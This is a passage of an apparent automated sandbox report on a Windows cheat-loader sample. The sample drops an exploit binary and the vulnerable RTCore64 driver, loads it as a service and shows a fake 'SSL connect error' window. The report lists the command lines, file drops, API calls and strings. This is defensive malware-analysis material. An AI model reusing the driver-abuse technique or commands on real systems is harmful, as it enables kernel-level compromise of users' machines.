oreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn | 4_2_00007FF7CC422900
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC4232C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn | 4_2_00007FF7CC4232C0
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC416810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree | 4_2_00007FF7CC416810
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC4145E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn | 4_2_00007FF7CC4145E0
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | File created: C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | File created: C:\Windows\driverfo.sys
Source: C:\Windows\Vulnerability.exe | File created: C:\Windows\symbols\
Source: C:\Windows\Vulnerability.exe | File created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb
Source: C:\Windows\Vulnerability.exe | File created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC4145E0
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC411330
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC413CE0
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC4172B0
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC417EA0
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC4232C0
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC423B60
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC41FBF0
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC416810
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC415010
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC416440
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe 4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys 27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nULoYBmSWb 01AA278B07B58DC46C84BD0B1B5C8E9EE4E62EA0BF7A695862444AF32E87F1FD
Source: C:\Windows\Vulnerability.exe | Process token adjusted: Load Driver
Source: C:\Windows\Vulnerability.exe | Code function: String function: 00007FF7CC41A3C0 appears 102 times
Source: C:\Windows\System32\certutil.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Source: C:\Windows\Vulnerability.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\nULoYBmSWb
Source: nULoYBmSWb.4.dr | Binary string: \Device\PhysicalMemory
Source: driverfo.sys.0.dr | Binary string: \Device\{83040329-923773830}
Source: nULoYBmSWb.4.dr | Binary string: 0\DosDevices\RTCore64\Device\RTCore64
Source: classification engine | Classification label: mal100.expl.evad.winEXE@27/9@1/3
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle | 4_2_00007FF7CC4214C0
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
Source: C:\Windows\Vulnerability.exe | File created: C:\Users\user\AppData\Local\Temp\nULoYBmSWb
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: lUAc7lqa56.exe | ReversingLabs: Detection: 37%
Source: lUAc7lqa56.exe | Virustotal: Detection: 29%
Source: unknown | Process created: C:\Users\user\Desktop\lUAc7lqa56.exe "C:\Users\user\Desktop\lUAc7lqa56.exe"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\Vulnerability.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\certutil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sysJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: lUAc7lqa56.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: lUAc7lqa56.exeStatic file information: File size 6062592 > 1048576
Source: lUAc7lqa56.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c7a00
Source: lUAc7lqa56.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
